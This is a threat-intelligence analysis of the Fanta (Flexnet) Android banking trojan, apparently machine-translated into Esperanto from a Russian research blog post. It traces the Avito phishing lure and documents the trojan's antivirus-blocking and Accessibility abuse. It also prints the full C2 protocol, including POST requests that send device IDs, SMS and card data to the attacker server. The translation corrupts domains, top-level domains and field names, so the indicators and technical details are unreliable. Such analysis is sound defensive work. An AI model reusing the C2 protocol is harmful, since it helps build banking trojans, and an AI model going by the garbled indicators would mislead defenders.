Iun tagon vi volas vendi ion sur Avito kaj, post afiŝi detalan priskribon de via produkto (ekzemple, RAM-modulo), vi ricevos la jenan mesaĝon:
Kiam vi malfermas la ligilon, vi vidos ŝajne senkulpan paĝon, kiu sciigas vin, la feliĉa kaj sukcesa vendisto, ke via aĉeto estas farita:
Post kiam vi klakis la butonon "Daŭrigi", APK-dosiero estos elŝutita al via Android-aparato kun ikono kaj fidinda nomo. Vi instalis aplikaĵon, kiu ial petis rajtojn de AccessibilityService, poste aperis kelkaj fenestroj kaj rapide malaperis kaj... Jen.
Vi iras kontroli vian saldon, sed ial via banka aplikaĵo denove petas viajn kartajn detalojn. Post enigo de la datumoj okazas terura afero: ial ankoraŭ nekomprenebla por vi, la mono komencas malaperi el via konto. Vi provas ripari la problemon, sed via telefono rezistas: ĝi premas la malantaŭan kaj hejman klavojn memstare, ne malŝaltas kaj ne permesas aktivigi ajnajn sekurecajn mezurojn. Kiel rezulto, vi restas sen mono, via produkto ne estas aĉetita, vi estas konfuzita kaj demandas: kio okazis?
La respondo estas simpla: vi estas viktimo de la Fanta Android-trojano, la familio Flexnet. Kiel ĝi okazis? Nun ni klarigu.
Aŭtoroj: Andrej Polovinkin, Juniora Malica Kodo-Analizisto, Ivan Pisarev, Malica Kodo-Analizisto.
Iuj statistikoj
La Flexnet-familio de Android-trojanoj estis unue raportita reen en 2015. Dum sufiĉe longa periodo de agado, la familio disetendiĝis al pluraj subspecioj: Fanta, Limebot, Lipton, ktp. La trojano, same kiel la infrastrukturo asociita kun ĝi, ne staras senmove: novaj efikaj distribuskemoj estas disvolvitaj - en nia kazo, altkvalitaj phishing-paĝoj celitaj al specifa uzantvendisto, kaj trojaj programistoj sekvas modajn tendencojn en viruso. skribo - ili aldonas novajn funkciojn, kiuj ebligas pli efike ŝteli monon de infektitaj aparatoj kaj preteriri protektajn mekanismojn.
La kampanjo priskribita en ĉi tiu artikolo celas uzantojn el Rusio, malgranda nombro da infektitaj aparatoj estis registritaj en Ukrainio, kaj eĉ malpli en Kazaĥio kaj Belorusio.
Kvankam Flexnet estas en la Android Trojan areno dum pli ol 4 jaroj kaj estis vaste studita de multaj esploristoj, ĝi ankoraŭ estas en bona formo. Ekde januaro 2019, la ebla kvanto de damaĝo estas pli ol 35 milionoj da rubloj - kaj ĉi tio estas nur por kampanjoj en Rusio. En 2015, diversaj versioj de ĉi tiu Android Trojan estis venditaj sur subteraj forumoj, kie vi ankaŭ povis trovi la fontkodon de la Trojano kun detala priskribo. Kaj ĉi tio signifas, ke la statistiko de damaĝo en la mondo estas eĉ pli impresa. Ne malbona figuro por tia maljunulo, ĉu ne?
De vendo al fraŭdo
Kiel videblas el la antaŭe prezentita ekrankopio de la paĝo de phishing sub la Interreta servo por meti reklamojn Avito, ĝi estis preta por specifa viktimo. Ŝajne, la atakantoj uzas unu el la analiziloj de Avito, elprenante la telefonnumeron kaj nomon de la vendisto, same kiel priskribon de la produkto. Post deplojado de la paĝo kaj preparado de la APK-dosiero, SMS-mesaĝo estas sendita al la viktimo kun lia nomo kaj ligilo al phishing-paĝo enhavanta priskribon de lia produkto kaj la kvanton ricevitan de la "vendo" de la produkto. Alklakante la butonon, la uzanto ricevas malican APK-dosieron - Fanta.
Studo de la domajno shcet491[.]ru montris, ke ĝi estas delegita al la DNS-serviloj de Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
La domajna zono dosiero enhavas enirojn montrantajn al la IP-adresoj 31.220.23[.]236, 31.220.23[.]243, kaj 31.220.23[.]235. Tamen, la domajna majstra rimeda rekordo (A-rekordo) montras al la servilo kun la IP-adreso 178.132.1[.]240.
La IP-adreso 178.132.1[.]240 situas en Nederlando kaj apartenas al la gastiganto mondfluo. La IP-adresoj 31.220.23[.]235, 31.220.23[.]236 kaj 31.220.23[.]243 situas en Britio kaj apartenas al la komuna gastiga servilo HOSTINGER. Uzita kiel registristo openprov-ru. La sekvaj domajnoj ankaŭ solvitaj al la IP-adreso 178.132.1[.]240:
- sdelka-ru[.]ru
- produkto-av[.]ru
- av-produkto[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]en
- sdelka211[.]en
- vyplata437[.]ru
- viplata291[.]en
- traduko273[.]eo
- traduko901[.]eo
Oni devas rimarki, ke ligiloj de la sekva formato estis haveblaj de preskaŭ ĉiuj domajnoj:
http://(www.){0,1}<%domain%>/[0-9]{7}
Ĉi tiu ŝablono ankaŭ inkluzivas ligilon de SMS-mesaĝo. Laŭ historiaj datumoj, oni trovis, ke pluraj ligiloj laŭ la supra ŝablono respondas al unu domajno, kio indikas la uzon de unu domajno por distribui la trojanon al pluraj viktimoj.
Ni iom antaŭeniru: kiel kontrolservilo, la trojano elŝutita de la ligilo de SMS uzas la adreson onuseseddohap[.]klubo. Ĉi tiu domajno estis registrita la 2019-03-12, kaj ekde 2019-04-29, APK-aplikoj interagis kun ĉi tiu domajno. Surbaze de datumoj akiritaj de VirusTotal, entute 109 aplikoj interagis kun ĉi tiu servilo. La domajno mem estas solvita al IP-adreso 217.23.14[.]27, situanta en Nederlando kaj posedata de gastiganto mondfluo. Uzita kiel registrilo nommalkara. Domajnoj ankaŭ estis solvitaj al ĉi tiu IP-adreso malbona-lavurso[.]klubo (ekde 2018-09-25) kaj malbona-lavurso[.]live (ekde 2018-10-25). Kun domajno malbona-lavurso[.]klubo interagis kun pli ol 80 APK-dosieroj, kun malbona-lavurso[.]live - pli ol 100.
Ĝenerale, la kurso de la atako estas kiel sekvas:
Kion Fanta havas sub la kovrilo?
Kiel multaj aliaj Android-trojanoj, Fanta kapablas legi kaj sendi SMS-mesaĝojn, fari USSD-petojn kaj montri siajn proprajn fenestrojn aldone al aplikaĵoj (inkluzive de bankaj). Tamen, en la arsenalo de la funcionalidad de ĉi tiu familio alvenis: Fanta komencis uzi Servo de Alirebleco por diversaj celoj: legi la enhavon de sciigoj de aliaj aplikaĵoj, malhelpi detekton kaj ĉesigi la ekzekuton de trojano sur infektita aparato, ktp. Fanta funkcias en ĉiuj Android-versioj pli malnovaj ol 4.4. En ĉi tiu artikolo, ni rigardos pli detale la sekvan Fanta-ekzemplaron:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Tuj post lanĉo
Tuj post lanĉo, la trojano kaŝas sian ikonon. La aplikaĵo povas funkcii nur se la nomo de la infektita aparato ne estas en la listo:
- android_x86
- VirtualaBox
- Nexus 5X (bovo)
- Nexus 5 (razilo)
Ĉi tiu kontrolo estas farita en la ĉefa troja servo - Ĉefservo. Dum la unua lanĉo, la agordaj parametroj de la aplikaĵo estas pravigitaj per defaŭltaj valoroj (la formato de konservado de datumoj de agordo kaj ilia signifo estos diskutitaj poste), same kiel la registrado de nova infektita aparato sur la kontrolservilo. HTTP POST-peto estos sendita al la servilo kun la mesaĝo-tipo registri_bot kaj informoj pri la infektita aparato (Android-versio, IMEI, telefonnumero, funkciigistonomo kaj kodo de la lando en kiu la telefonisto estas registrita). Adreso estas uzata kiel administra servilo hXXp://onuseseddohap[.]club/controller.php. Responde, la servilo sendas mesaĝon enhavantan la kampojn bot_id, bot_pwd, servilo — la aplikaĵo konservas ĉi tiujn valorojn kiel parametrojn de la CnC-servilo. Parametro servilo nedeviga se la kampo ne estis ricevita: Fanta uzas la registradreson − hXXp://onuseseddohap[.]club/controller.php. La funkcio ŝanĝi la CnC-adreson povas esti uzata por solvi du problemojn: por egale distribui la ŝarĝon inter pluraj serviloj (kun granda nombro da infektitaj aparatoj, la ŝarĝo sur neoptimumigita retservilo povas esti alta), kaj ankaŭ uzi alternativon. servilo en kazo de malsukceso de unu el la CnC-serviloj.
Se eraro okazas dum sendado de la peto, la trojano ripetos la registran procezon post 20 sekundoj.
Post sukcese registri la aparaton, Fanta montros la sekvan mesaĝon al la uzanto:
Grava noto: servo vokis Sistemo Sekureco — la nomo de la troja servo, kaj post klako de la butono OK malfermiĝos fenestro kun la agordoj de Alirebleco de la infektita aparato, kie la uzanto devas mem doni alireblecojn por la malica servo:
Post kiam la uzanto ŝaltas Servo de Alirebleco, Fanta aliras la enhavon de aplikaĵfenestroj kaj agoj faritaj en ili:
Tuj post akiri Alirebleco-rajtojn, la trojano petas administrantajn rajtojn kaj rajtojn legi sciigojn:
Kun la helpo de la Alirebleco-Servo, la aplikaĵo simulas klavpremojn, tiel donante al si ĉiujn necesajn rajtojn.
Fanta kreas plurajn kazojn de la datumbazoj (kiuj estos priskribitaj poste) necesaj por konservi la agordajn datumojn, same kiel la informojn pri la infektita aparato kolektita dum la procezo. Por sendi la kolektitajn informojn, la Trojano kreas ripetiĝantan taskon desegnitan por malŝarĝi kampojn el la datumbazo kaj ricevi komandon de la kontrolservilo. La intervalo por voki CnC estas agordita depende de la versio de Android: en la kazo de 5.1, la intervalo estos 10 sekundoj, alie 60 sekundoj.
Por ricevi ordonon, Fanta faras peton GetTask al la kontrolservilo. En respondo, la CnC povas sendi unu el la sekvaj komandoj:
| teamo | Priskribo |
|---|---|
| 0 | Sendu SMS-mesaĝon |
| 1 | Faru telefonvokon aŭ komandon de USSD |
| 2 | Ĝisdatigas parametron intervalo |
| 3 | Ĝisdatigas parametron interkapti |
| 6 | Ĝisdatigas parametron smsManager |
| 9 | Komencu kolekti SMS-mesaĝojn |
| 11 | Restarigu vian telefonon al fabrikaj agordoj |
| 12 | Ebligu/Malŝalti protokolon de kreado de dialogujo |
Fanta ankaŭ kolektas sciigojn de 70 bankaj, rapidaj pagoj kaj elektronikaj monujoj kaj stokas ilin en datumbazo.
Stokado de agordaj parametroj
Por stoki agordajn parametrojn, Fanta uzas la norman aliron por la Android-platformo − Agordoj- dosieroj. La agordoj estos konservitaj al dosiero nomita agordojn. La priskribo de la konservitaj parametroj estas en la suba tabelo.
| nomo | Defaŭlta valoro | Eblaj valoroj | Priskribo |
|---|---|---|---|
| id | 0 | entjera | Bot-identigilo |
| servilo | hXXp://onuseseddohap[.]klubo/ | URL | Administra servilo adreso |
| pwd | - | ĉeno | Pasvorto de la servilo |
| intervalo | 20 | entjera | Tempointervalo. Montras kiom longe prokrasti la sekvajn taskojn:
|
| interkapti | ĉiuj | ĉiuj/telNumero | Se kampo estas egala al ĉeno ĉiuj aŭ telNumero, tiam la ricevita SMS-mesaĝo estos kaptita de la aplikaĵo kaj ne montrita al la uzanto |
| smsManager | 0 | 0/1 | Ebligu / malebligu la aplikaĵon kiel la defaŭltan SMS-ricevanton |
| legu Dialogon | falsa | Vera/malvera | Ebligu/Malŝalti eventoregistradon AlireblecoOkazaĵo |
Fanta ankaŭ uzas la dosieron smsManager:
| nomo | Defaŭlta valoro | Eblaj valoroj | Priskribo |
|---|---|---|---|
| pckg | - | ĉeno | La nomo de la SMS-administranto uzata |
Datumbaza interago
La Trojano uzas du datumbazojn dum sia funkciado. Nomita datumbazo a uzata por konservi diversajn informojn kolektitajn de la telefono. La dua datumbazo estas nomita fanta.db kaj estas uzata por konservi agordojn respondecajn pri kreado de phishing fenestroj dizajnitaj por kolekti informojn pri bankkartoj.
Trojano uzas datumbazon а por konservi kolektitajn informojn kaj registri viajn agojn. Datumoj estas konservitaj en tabelo registroj. La sekva SQL-demando estas uzata por krei tabelon:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)La datumbazo enhavas la jenajn informojn:
1. Ensaluti la infektitan aparaton per mesaĝo Telefono ŝaltita!
2. Sciigoj de aplikoj. La mesaĝo estas formita laŭ la sekva ŝablono:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Bankkarto datumoj de phishing formoj kreitaj de la trojano. Parametro VIEW_NAME povas esti unu el la listo:
- AliExpress
- Avito
- Google Play
- Diversaj <%App Name%>
La mesaĝo estas ensalutinta en la formato:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Envenantaj/elirantaj SMS-mesaĝoj en la formato:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Informoj pri la pako, kiu kreas la dialogujon en la formato:
(<%Package name%>)<%Package information%>
Tablo ekzemplo registroj:
Unu el la funkcioj de Fanta estas la kolekto de informoj pri bankkartoj. Datenoj estas kolektitaj kreante phishing-fenestrojn dum malfermado de bankaplikoj. La trojano kreas phishing fenestron nur unufoje. La informoj, ke la fenestro estis montrita al la uzanto, estas konservitaj en la tabelo agordojn en la datumbazo fanta.db. La sekva SQL-demando estas uzata por krei la datumbazon:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Ĉiuj tabelkampoj agordojn pravigita al 1 (kreu phishing fenestro) defaŭlte. Post kiam la uzanto enigas siajn datumojn, la valoro estos agordita al 0. Tabelkampoj ekzemplo agordojn:
- povas_ensaluti — la kampo respondecas pri montri la formularon dum malfermado de la banka aplikaĵo
- unua_banko - ne uzata
- can_avito - la kampo respondecas pri montri la formularon dum malfermado de la aplikaĵo Avito
- can_ali - la kampo respondecas pri montri la formularon kiam vi malfermas la Aliexpress-aplikaĵon
- povas_alia - la kampo respondecas pri montri la formularon dum malfermado de ajna aplikaĵo el la listo: Yula, Pandao, Drome Auto, Monujo. Rabat- kaj bonus-kartoj, Aviasales, Booking, Trivago
- povas_karto - la kampo respondecas pri montri la formularon dum malfermo Google Play
Interago kun la kontrolservilo
Reta interago kun la kontrolservilo okazas per la HTTP-protokolo. Fanta uzas la popularan Retrofit-bibliotekon por labori kun la reto. Petoj estas senditaj al hXXp://onuseseddohap[.]club/controller.php. La servila adreso povas esti ŝanĝita dum registriĝo sur la servilo. Kuketo povas esti resendita de la servilo. Fanta faras la jenajn petojn al la servilo:
- Bot-registrado sur la kontrolservilo okazas unufoje ĉe la unua komenco. La sekvaj datumoj pri la infektita aparato estas senditaj al la servilo:
· Kuketo - kuketoj ricevitaj de la servilo (defaŭlta valoro estas malplena ĉeno)
· reĝimo - korda konstanto registri_bot
· Prefikso — entjera konstanto 2
· version_sdk - estas formita laŭ la sekva ŝablono: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· IMEI — IMEI de la infektita aparato
· lando — kodo de la lando en kiu la funkciigisto estas registrita, en ISO-formato
· nombro - telefonnumero
· operacianto - nomo de operatoroEkzemplo de peto sendita al la servilo:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Responde al la peto, la servilo devus resendi JSON-objekton enhavantan la sekvajn parametrojn:
bot_id — identigilo de la infektita aparato. Se bot_id estas egala al 0, Fanta denove plenumos la peton.
bot_pwd - pasvorto por la servilo.
servilo — kontroli servilon adreson. Laŭvola parametro. Se la parametro ne estas specifita, la adreso konservita en la aplikaĵo estos uzata.Ekzemplo de JSON-objekto:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Peto ricevi komandon de la servilo. La sekvaj datumoj estas senditaj al la servilo:
· Kuketo — kuketoj ricevitaj de la servilo
· oferto — id de la infektita aparato, kiu estis ricevita dum sendado de la peto registri_bot
· pwd -pasvorto por la servilo
· divice_admin - la kampo determinas ĉu administrantorajtoj estis akiritaj. Se administrantorajtoj estis akiritaj, la kampo estas egala al 1, alie 0
· alirebleco - la statuso de la Alirebleco-Servo. Se la servo estis komencita, la valoro estas 1, alie 0
· SMSManager — montras ĉu la Trojano estas ebligita kiel la defaŭlta aplikaĵo por ricevi SMS
· ekrano — montras en kia stato estas la ekrano. valoro estos fiksita 1se la ekrano estas ŝaltita, alie 0;Ekzemplo de peto sendita al la servilo:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Depende de la komando, la servilo povas resendi JSON-objekton kun malsamaj parametroj:
· teamo Sendu SMS-mesaĝon: La parametroj enhavas la telefonnumeron, la tekston de la SMS-mesaĝo kaj la identigilon de la sendota mesaĝo. La identigilo estas uzata kiam oni sendas mesaĝon al la servilo kun la tipo setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· teamo Faru telefonvokon aŭ komandon de USSD: La telefonnumero aŭ komando venas en la respondkorpon.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· teamo Ŝanĝu la intervalparametron.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· teamo Ŝanĝu interkaptan parametron.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· teamo Ŝanĝi SMSManager kampo.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· teamo Kolektu SMS-mesaĝojn de infektita aparato.
{ "response": [ { "mode": 9 } ], "status":"ok" }· teamo Restarigu vian telefonon al fabrikaj agordoj:
{ "response": [ { "mode": 11 } ], "status":"ok" }· teamo Ŝanĝu la parametron ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Sendante mesaĝon kun tipo setSmsStatus. Ĉi tiu peto estas farita post la ekzekuto de la komando Sendu SMS-mesaĝon. La peto aspektas jene:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Sendu la enhavon de la datumbazo. Unu ŝnuro estas sendita per peto. La sekvaj datumoj estas senditaj al la servilo:
· Kuketo — kuketoj ricevitaj de la servilo
· reĝimo - korda konstanto agordu Konservu EnirkestonSms
· oferto — id de la infektita aparato, kiu estis ricevita dum sendado de la peto registri_bot
· teksto — teksto en la nuna datumbaza registro (kampo d de la tablo registroj en la datumbazo а)
· nombro — nomo de la nuna datumbaza rekordo (kampo p de la tablo registroj en la datumbazo а)
· sms_mode — entjera valoro (kampo m de la tablo registroj en la datumbazo а)La peto aspektas jene:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Post sukcesa submetiĝo al la servilo, la vico estos forigita de la tabelo. Ekzemplo de JSON-objekto resendita de la servilo:
{ "response":[], "status":"ok" }
Interago kun AccessibilityService
La Alirebleco-Servo estis efektivigita por faciligi al homoj kun handikapoj uzi Android-aparatojn. Plejofte, fizika interagado estas postulata por interagi kun aplikaĵo. AccessibilityService permesas vin fari ilin programe. Fanta uzas la servon por krei falsajn fenestrojn en bankaplikoj kaj malhelpi sistemajn agordojn kaj iujn aplikojn malfermiĝi.
Uzante la funkciojn de la Alirebleco-Servo, la troja monitoras ŝanĝojn al elementoj sur la ekrano de infektita aparato. Kiel antaŭe priskribite, la Fanta-agordoj enhavas parametron respondecan pri registradoperacioj kun dialogujoj - legu Dialogon. Se ĉi tiu opcio estas agordita, informoj pri la nomo kaj priskribo de la pako kiu ekigis la eventon estos aldonitaj al la datumbazo. La trojano faras la sekvajn agojn kiam ĝi estas ekigita:
- Simulas malantaŭajn kaj hejmajn klavojn en kazo de:
· se la uzanto volas rekomenci sian aparaton
· se la uzanto volas forigi la aplikaĵon "Avito" aŭ ŝanĝi la alirrajtojn
· se estas mencio pri la aplikaĵo "Avito" sur la paĝo
· kiam vi malfermas la apon "Google Play Protect".
· kiam vi malfermas paĝojn kun agordoj de AccessibilityService
· kiam aperas la dialogujo de Sistemo Sekureco
· kiam vi malfermas la paĝon kun la agordoj "Desegnu super alia aplikaĵo".
· kiam vi malfermas la paĝon "Aplikoj", "Sekurkopio kaj Restarigi", "Restarigi datumojn", "Restarigi Agordojn", "Panelo por programistoj", "Spec. ŝancoj", "Alirebleco", "Specialaj rajtoj"
· se la evento estis generita de certaj aplikoj.Listo de aplikaĵoj
- android
- Majstro Lite
- Pura Majstro
- Pura Majstro por x86 CPU
- Meizu Aplika Permesa Administrado
- Sekureco de MIUI
- Pura Majstro - Antivirusa & Kaŝmemoro & Rubaĵo Purigilo
- Gepatra kontrolo kaj GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Viruspurigilo, Antiviruso, Purigilo (MAX Security)
- Mobile AntiVirus Security PRO
- Avast antivirus & senpaga protekto 2019
- Poŝtelefona Sekureco MegaFon
- AVG-Protekto por Xperia
- Poŝtelefona Sekureco
- Malwarebytes kontraŭviruso kaj protekto
- Antiviruso por Android 2019
- Sekureca Majstro - Antiviruso, VPN, AppLock, Booster
- AVG antivirus por tablojdo Huawei System Manager
- Samsung Alirebleco
- Samsung Smart Manager
- Sekureca Majstro
- Speed Booster
- dr.web
- Sekureca Spaco de Dr.Web
- Dr.Web Poŝtelefona Kontrolcentro
- Dr.Web Sekureco Spaca Vivo
- Dr.Web Poŝtelefona Kontrolcentro
- Antivirusa & Poŝtelefona Sekureco
- Kaspersky Internet Security: Antiviruso kaj Protekto
- Kaspersky Bateria Vivo: Ŝparilo kaj Akcelilo
- Kaspersky Endpoint Security - protekto kaj administrado
- AVG Antivirus senpaga 2019 - Protekto por Android
- Antivirus Android
- Norton Mobile Security kaj Antivirus
- Antiviruso, fajroŝirmilo, VPN, movebla sekureco
- Poŝtelefona Sekureco: Antivirus, VPN, Kontraŭŝtelo
- Antiviruso por Android
- Se permeso estas petita dum sendado de SMS-mesaĝo al mallonga numero, Fanta simulas klaki sur la markobutono Memoru elekton kaj butonon sendi.
- Kiam vi provas forigi administrantajn rajtojn de la Trojano, ĝi blokas la telefonan ekranon.
- Malhelpas novajn administrantojn aldoni.
- Se la antivirusa aplikaĵo dr.web detektis minacon, Fanta simulas premi butonon ignori.
- La trojano simulas premi la malantaŭan kaj hejmen butonon se la evento estis generita de la aplikaĵo Samsung Aparato Prizorgo.
- Fanta kreas phishing-fenestrojn kun formoj por enigi informojn pri bankkartoj se aplikaĵo el listo de ĉirkaŭ 30 malsamaj interretaj servoj estas lanĉita. Inter ili: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drome Auto, ktp.
Phishing Formoj
Fanta analizas kiuj aplikoj funkcias sur la infektita aparato. Se aplikaĵo de intereso estis malfermita, la trojano montras phishing-fenestron super ĉiuj aliaj, kiu estas formo por enigi informojn pri bankkarto. La uzanto devas enigi la sekvajn datumojn:
- Kartonumero
- Karto limdato
- CVV
- Nomo de kartposedanto (ne por ĉiuj bankoj)
Depende de la funkcianta aplikaĵo, malsamaj phishing fenestroj estos montritaj. La sekvantaroj estas ekzemploj de kelkaj el ili:
AliExpress:
Avito:
Por iuj aliaj aplikoj kiel Google Play Market, Aviasales, Pandao, Booking, Trivago:
Kiel ĝi vere estis
Feliĉe, la persono, kiu ricevis la SMS-mesaĝon priskribitan komence de la artikolo, montriĝis esti specialisto pri cibersekureco. Tial la vera, ne-direktoro versio diferencas de tiu antaŭe rakontita: la persono ricevis interesan SMS, post kiu li donis ĝin al la Group-IB Threat Hunting Intelligence-teamo. La rezulto de la atako estas ĉi tiu artikolo. Feliĉa fino, ĉu ne? Tamen ne ĉiuj rakontoj finiĝas tiel bone, kaj por ke la via ne aspektu kiel reĝisoro kun perdo de mono, plejofte sufiĉas aliĝi al la sekvaj longe priskribitaj reguloj:
- ne instalu aplikojn por poŝtelefono kun Android OS el iuj fontoj krom Google Play
- instalante la aplikaĵon, atentu la rajtojn postulatajn de la aplikaĵo
- atentu etendaĵojn de alŝutitaj dosieroj
- instali ĝisdatigojn de Android OS regule
- ne vizitu suspektindajn rimedojn kaj ne elŝutu dosierojn de tie
- Ne alklaku ligilojn ricevitajn en SMS-mesaĝoj.
fonto: www.habr.com